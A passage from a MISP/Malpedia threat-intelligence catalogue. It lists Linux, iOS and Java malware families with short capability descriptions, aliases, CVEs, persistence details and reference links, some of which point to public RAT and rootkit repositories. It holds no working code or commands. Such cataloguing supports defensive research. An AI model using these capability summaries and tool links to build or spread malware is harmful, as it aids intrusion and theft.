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<td><a href="https://twitter.com/IntezerLabs/status/1338480158249013250">https://twitter.com/IntezerLabs/status/1338480158249013250</a></td>
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**Pro-Ocean**

Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.

The tag is: `misp-galaxy:malpedia="Pro-Ocean"

Pro-Ocean is also known as:

**Table 1026. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean">https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/">https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/</a></td>
</tr>
</tbody>
</table>
pupy (ELF)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

The tag is: misp-galaxy:malpedia="pupy (ELF)"

pupy (ELF) is also known as:

Table 1027. Table References

| Links                                                                 |
|                                                                     |
| https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy           |
| https://github.com/n1nj4sec/pupy                                    |

QNAPCrypt

The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:

1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.
2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.
3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.

The tag is: misp-galaxy:malpedia="QNAPCrypt"

QNAPCrypt is also known as:

• eCh0raix

Table 1028. Table References

| Links                                                             |
|                                                                  |
| https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt   |
QSnatch

The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes.

The tag is: `misp-galaxy:malpedia="QSnatch"`

QSnatch is also known as:

Table 1029. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch">https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch</a></td>
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<tr>
<td><a href="https://bin.re/blog/the-dga-of-qsnatch/">https://bin.re/blog/the-dga-of-qsnatch/</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-209a">https://us-cert.cisa.gov/ncas/alerts/aa20-209a</a></td>
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r2r2

The tag is: `misp-galaxy:malpedia="r2r2"`

r2r2 is also known as:

Table 1030. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2">https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2</a></td>
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**Rakos**

The tag is: *misp-galaxy:malpedia=*Rakos*

Rakos is also known as:

*Table 1031. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos">https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos</a></td>
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**RansomEXX (ELF)**

The tag is: *misp-galaxy:malpedia=*RansomEXX (ELF)*

RansomEXX (ELF) is also known as:

- Defray777

*Table 1032. Table References*

<table>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx">https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx</a></td>
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<tr>
<td><a href="https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware">https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware</a></td>
</tr>
<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/">https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/</a></td>
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<tr>
<td><a href="https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195">https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195</a></td>
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**RaspberryPiBotnet**

The tag is: *misp-galaxy:malpedia=*RaspberryPiBotnet*

RaspberryPiBotnet is also known as:

*Table 1033. Table References*
rat_hodin

The tag is: misp-galaxy:malpedia="rat_hodin"

rat_hodin is also known as:

Table 1034. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin">https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin</a></td>
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<tr>
<td><a href="https://github.com/Thibault-69/RAT-Hodin-v2.5">https://github.com/Thibault-69/RAT-Hodin-v2.5</a></td>
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rbs_srv

The tag is: misp-galaxy:malpedia="rbs_srv"

rbs_srv is also known as:

Table 1035. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv">https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv</a></td>
</tr>
<tr>
<td><a href="https://github.com/Thibault-69/Remote_Shell">https://github.com/Thibault-69/Remote_Shell</a></td>
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RedXOR

The tag is: misp-galaxy:malpedia="RedXOR"

RedXOR is also known as:

Table 1036. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.redxor">https://malpedia.caad.fkie.fraunhofer.de/details/elf.redxor</a></td>
</tr>
</tbody>
</table>

Rekoobe

A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm
Rekoobe is also known as:

Table 1037. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe">https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe</a></td>
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<tr>
<td><a href="https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/">https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/</a></td>
</tr>
<tr>
<td><a href="https://vms.drweb.com/virus/?i=7754026&amp;lng=en">https://vms.drweb.com/virus/?i=7754026&amp;lng=en</a></td>
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reptile

The tag is: misp-galaxy:malpedia="reptile"

reptile is also known as:

Table 1038. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile">https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile</a></td>
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<tr>
<td><a href="https://github.com/f0rb1dd3n/Reptile">https://github.com/f0rb1dd3n/Reptile</a></td>
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Rex

The tag is: misp-galaxy:malpedia="Rex"

Rex is also known as:

Table 1039. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex">https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex</a></td>
</tr>
<tr>
<td><a href="https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/">https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/</a></td>
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RHOMBUS

The tag is: misp-galaxy:malpedia="RHOMBUS"

RHOMBUS is also known as:

Table 1040. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus">https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus</a></td>
</tr>
</tbody>
</table>
Roboto

P2P Botnet discovered by Netlab360. The botnet infects Linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process’ network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.

The tag is: `misp-galaxy:malpedia="Roboto"`

Roboto is also known as:

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<tr>
<td><a href="https://blog.netlab.360.com/the-awaiting-roboto-botnet-en">https://blog.netlab.360.com/the-awaiting-roboto-botnet-en</a></td>
</tr>
</tbody>
</table>

Satori

Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).

The tag is: `misp-galaxy:malpedia="Satori"`

Satori is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori">https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori</a></td>
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<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/the-arc-of-satori/">https://www.arbornetworks.com/blog/asert/the-arc-of-satori/</a></td>
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ShellBind

The tag is: misp-galaxy:malpedia="ShellBind"

ShellBind is also known as:

* Table 1043. Table References
  * Links
    * [https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind](https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind)

Shishiga

The tag is: misp-galaxy:malpedia="Shishiga"

Shishiga is also known as:

* Table 1044. Table References
  * Links
    * [https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga](https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga)

Silex

The tag is: misp-galaxy:malpedia="Silex"

Silex is also known as:

* silexbot

* Table 1045. Table References
  * Links
    * [https://malpedia.caad.fkie.fraunhofer.de/details/elf.silex](https://malpedia.caad.fkie.fraunhofer.de/details/elf.silex)

SLAPSTICK

According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.
The tag is: `misp-galaxy:malpedia="SLAPSTICK"`

SLAPSTICK is also known as:

*Table 1046. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick">https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick</a></td>
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**Spamtorte**

The tag is: `misp-galaxy:malpedia="Spamtorte"`

Spamtorte is also known as:

*Table 1047. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte">https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte</a></td>
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**SpeakUp**

The tag is: `misp-galaxy:malpedia="SpeakUp"`

SpeakUp is also known as:

*Table 1048. Table References*

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<tr>
<td><a href="https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/">https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/</a></td>
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**Specter**

The tag is: `misp-galaxy:malpedia="Specter"`

Specter is also known as:

*Table 1049. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter">https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter</a></td>
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Speculoos

The tag is: `misp-galaxy:malpedia="Speculoos"`

Speculoos is also known as:

Table 1050. Table References

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<td><a href="https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html">https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-atlas">https://www.secureworks.com/research/threat-profiles/bronze-atlas</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/">https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/</a></td>
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SSHDoor

The tag is: `misp-galaxy:malpedia="SSHDoor"`

SSHDoor is also known as:

Table 1051. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor">https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/">https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/</a></td>
</tr>
<tr>
<td><a href="http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html">http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html</a></td>
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Stantinko

The tag is: `misp-galaxy:malpedia="Stantinko"`

Stantinko is also known as:

Table 1052. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko">https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/">https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/">https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/</a></td>
</tr>
</tbody>
</table>
STEELCORGI

According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.

The tag is: *misp-galaxy:malpedia*="STEELCORGI"

STEELCORGI is also known as:

Table 1053. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi">https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi</a></td>
</tr>
<tr>
<td><a href="https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/">https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/</a></td>
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Sunless

The tag is: *misp-galaxy:malpedia*="Sunless"

Sunless is also known as:

Table 1054. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless">https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless</a></td>
</tr>
<tr>
<td><a href="https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/">https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/</a></td>
</tr>
</tbody>
</table>

sustes miner

Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software.

The tag is: *misp-galaxy:malpedia*="sustes miner"

sustes miner is also known as:
Table 1055. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes">https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes</a></td>
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TeamTNT

The tag is: *misp-galaxy:malpedia=*"TeamTNT"

TeamTNT is also known as:

Table 1056. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt">https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt</a></td>
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<tr>
<td><a href="https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment">https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/">https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/</a></td>
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TheMoon

The tag is: *misp-galaxy:malpedia=*"TheMoon"

TheMoon is also known as:

Table 1057. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon">https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon</a></td>
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<td><a href="https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers">https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers</a></td>
</tr>
<tr>
<td><a href="https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902">https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902</a></td>
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TNTbotinger

The tag is: *misp-galaxy:malpedia=*"TNTbotinger"

TNTbotinger is also known as:

Table 1058. Table References
Torii

The tag is: `misp-galaxy:malpedia="Torii"`

Torii is also known as:

`Table 1059. Table References`

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Trump Bot

The tag is: `misp-galaxy:malpedia="Trump Bot"`

Trump Bot is also known as:

`Table 1060. Table References`

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TSCookie

The tag is: `misp-galaxy:malpedia="TSCookie"`

TSCookie is also known as:

`Table 1061. Table References`

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tsh

The tag is: misp-galaxy:malpedia="tsh"

tsh is also known as:

Table 1062. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh">https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh</a></td>
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<tr>
<td><a href="https://github.com/creaktive/tsh">https://github.com/creaktive/tsh</a></td>
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Tsunami (ELF)

The tag is: misp-galaxy:malpedia="Tsunami (ELF)"

Tsunami (ELF) is also known as:

- Amnesia
- Muhstik
- Radiation

Table 1063. Table References

<table>
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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami">https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami</a></td>
</tr>
<tr>
<td><a href="https://blog.aquasec.com/fileless-malware-container-security">https://blog.aquasec.com/fileless-malware-container-security</a></td>
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</table>
Turla RAT

The tag is: misp-galaxy:malpedia="Turla RAT"

Turla RAT is also known as:

Table 1064. Table References

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Umbreon

The tag is: misp-galaxy:malpedia="Umbreon"

Umbreon is also known as:

- Espeon

Table 1065. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon">https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon</a></td>
</tr>
</tbody>
</table>

Unidentified Linux 001

According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in linux email servers. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.

The tag is: misp-galaxy:malpedia="Unidentified Linux 001"

Unidentified Linux 001 is also known as:

Table 1066. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001</a></td>
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</tbody>
</table>

Unidentified Linux 002

Golang-based RAT that offers execution of shell commands and download+run capability.
The tag is: misp-galaxy:malpedia="Unidentified Linux 002"

Unidentified Linux 002 is also known as:

Table 1067. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002">https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002</a></td>
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elf.vpnfilter

The tag is: misp-galaxy:malpedia="elf.vpnfilter"

elf.vpnfilter is also known as:

Table 1068. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter">https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1">https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1</a></td>
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<tr>
<td><a href="https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/">https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html">https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html</a></td>
</tr>
<tr>
<td><a href="https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/">https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2018/05/VPNFilter.html">https://blog.talosintelligence.com/2018/05/VPNFilter.html</a></td>
</tr>
</tbody>
</table>
**WatchBog**

According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C addresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.

The tag is: `misp-galaxy:malpedia="WatchBog"`

WatchBog is also known as:

*Table 1069. Table References*

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog">https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog</a></td>
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**WellMail**

The tag is: `misp-galaxy:malpedia="WellMail"`

WellMail is also known as:

*Table 1070. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail">https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c</a></td>
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<tr>
<td><a href="https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html">https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2020/08/attribution-puzzle.html">https://blog.talosintelligence.com/2020/08/attribution-puzzle.html</a></td>
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</tbody>
</table>

**elf.wellness**

The tag is: `misp-galaxy:malpedia="elf.wellness"`

elf.wellness is also known as:

*Table 1071. Table References*
Winnti (ELF)

The tag is: `misp-galaxy:malpedia="Winnti (ELF)"

Winnti (ELF) is also known as:

Table 1072. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti">https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-atlas">https://www.secureworks.com/research/threat-profiles/bronze-atlas</a></td>
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<tr>
<td><a href="https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a">https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a</a></td>
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Wirenet (ELF)

The tag is: `misp-galaxy:malpedia="Wirenet (ELF)"

Wirenet (ELF) is also known as:

Table 1073. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet">https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet</a></td>
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</tbody>
</table>
**X-Agent (ELF)**

The tag is: *misp-galaxy:malpedia=*"X-Agent (ELF)"

X-Agent (ELF) is also known as:

- chopstick
- fysbis
- splm

*Table 1074. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent">https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/">https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/</a></td>
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<td><a href="http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/">http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/</a></td>
</tr>
<tr>
<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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**Xanthe**

The tag is: *misp-galaxy:malpedia=*"Xanthe"

Xanthe is also known as:

*Table 1075. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe">https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe</a></td>
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<td><a href="https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html">https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html</a></td>
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**Xaynnalc**

The tag is: *misp-galaxy:malpedia=*"Xaynnalc"
Xaynnalc is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc">https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc</a></td>
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<td><a href="https://twitter.com/michalmalik/status/846368624147353601">https://twitter.com/michalmalik/status/846368624147353601</a></td>
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**Xbash**

The tag is: *misp-galaxy:malpedia=*"Xbash"

Xbash is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash">https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash</a></td>
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**XOR DDoS**

Linux DDoS C&C Malware

The tag is: *misp-galaxy:malpedia=*"XOR DDoS"

XOR DDoS is also known as:

- XORDDOS

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<td><a href="https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html">https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html</a></td>
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<tr>
<td><a href="https://en.wikipedia.org/wiki/Xor_DDoS">https://en.wikipedia.org/wiki/Xor_DDoS</a></td>
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</table>
Zollard

The tag is: misp-galaxy:malpedia="Zollard"

Zollard is also known as:

- darlloz

AutoCAD Downloader

Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.

The tag is: misp-galaxy:malpedia="AutoCAD Downloader"

AutoCAD Downloader is also known as:

- Acad.Bursted
- Duxfas

DualToy (iOS)

The tag is: misp-galaxy:malpedia="DualToy (iOS)"

DualToy (iOS) is also known as:
GuiInject

The tag is: misp-galaxy:malpedia="GuiInject"

GuiInject is also known as:

lightSpy

The tag is: misp-galaxy:malpedia="lightSpy"

lightSpy is also known as:

PoisonCarp

The tag is: misp-galaxy:malpedia="PoisonCarp"

PoisonCarp is also known as:

• INSOMNIA
WireLurker (iOS)

The iOS malware that is installed over USB by osx.wirelurker

The tag is: misp-galaxy:malpedia="WireLurker (iOS)"

WireLurker (iOS) is also known as:

Table 1085. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker">https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker</a></td>
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X-Agent (iOS)

The tag is: misp-galaxy:malpedia="X-Agent (iOS)"

X-Agent (iOS) is also known as:

Table 1086. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ios.xagent">https://malpedia.caad.fkie.fraunhofer.de/details/ios.xagent</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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</table>

AdWind

Part of Malware-as-service platform Used as a generic name for Java-based RAT Functionality - collect general system and user information - terminate process - log keystroke - take screenshot and access webcam - steal cache password from local or web forms - download and execute Malware - modify registry - download components - Denial of Service attacks - Acquire VPN certificates

Initial infection vector 1. Email to JAR files attached 2. Malspam URL to download the malware

Persistence - Runkey - HKCU\Software\Microsoft\Windows\current version\run

Hiding Uses attrib.exe
Notes on Adwind The malware is not known to be proxy aware

The tag is: misp-galaxy:malpedia="AdWind"

AdWind is also known as:

- AlienSpy
- Frutas
- JBifrost
- JSocket
- Sockrat
- UNRECOM

Table 1087. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind">https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind</a></td>
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<tr>
<td><a href="https://research.checkpoint.com/malware-against-the-c-monoculture/">https://research.checkpoint.com/malware-against-the-c-monoculture/</a></td>
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<td><a href="http://malware-traffic-analysis.net/2017/07/04/index.html">http://malware-traffic-analysis.net/2017/07/04/index.html</a></td>
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<td><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat">http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat</a></td>
</tr>
<tr>
<td><a href="https://gist.github.com/herrcore/8336975475e88f9bc539d59400412885">https://gist.github.com/herrcore/8336975475e88f9bc539d59400412885</a></td>
</tr>
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<td><a href="https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat">https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat</a></td>
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<td><a href="https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/">https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/</a></td>
</tr>
<tr>
<td><a href="https://citizenlab.ca/2015/12/packrat-report/">https://citizenlab.ca/2015/12/packrat-report/</a></td>
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</table>

Adzok

The tag is: misp-galaxy:malpedia="Adzok"

Adzok is also known as:

Table 1088. Table References
Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok
https://citizenlab.ca/2015/12/packrat-report/

**Banload**

The tag is: `misp-galaxy:malpedia="Banload"`

Banload is also known as:

*Table 1089. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload">https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload</a></td>
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<tr>
<td><a href="https://colin.guru/index.php?title=Advanced_Banload_Analysis">https://colin.guru/index.php?title=Advanced_Banload_Analysis</a></td>
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</table>

**Blue Banana RAT**

The tag is: `misp-galaxy:malpedia="Blue Banana RAT"`

Blue Banana RAT is also known as:

*Table 1090. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/jar.bluebanana">https://malpedia.caad.fkie.fraunhofer.de/details/jar.bluebanana</a></td>
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<tr>
<td><a href="https://www.virustotal.com/gui/file/60faab36491e07f10bf6a3ebe66ed9238459b2af7e36118fccd50583728141a4/community">https://www.virustotal.com/gui/file/60faab36491e07f10bf6a3ebe66ed9238459b2af7e36118fccd50583728141a4/community</a></td>
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**CrossRAT**

